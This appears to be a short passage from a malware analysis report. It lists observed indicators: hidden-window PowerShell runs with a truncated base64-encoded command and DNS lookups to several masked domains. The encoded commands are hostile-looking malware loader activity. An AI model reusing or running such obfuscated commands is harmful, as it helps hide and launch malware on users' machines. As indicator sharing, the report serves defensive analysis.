Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABZAEQARwBBAEEAQQBEAEEAPQAnAFIAQwB3AFUAXwBBAEMARABfAFgAJwA7ACQARQA0AEEAQQB4AEQAMQBCAEEAbwBDAEEAQQAgAD...
- DNS ASK gp###diri.com
- DNS ASK am####gbdshop.com
- DNS ASK so###port.com
- DNS ASK mw###nic.com
- DNS ASK te####calakshay.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABZAEQARwBBAEEAQQBEAEEAPQAnAFIAQwB3AFUAXwBBAEMARABfAFgAJwA7ACQARQA0AEEAQQB4AEQAMQBCAEEAbwBDAEEAQQAgAD...' (with hidden window)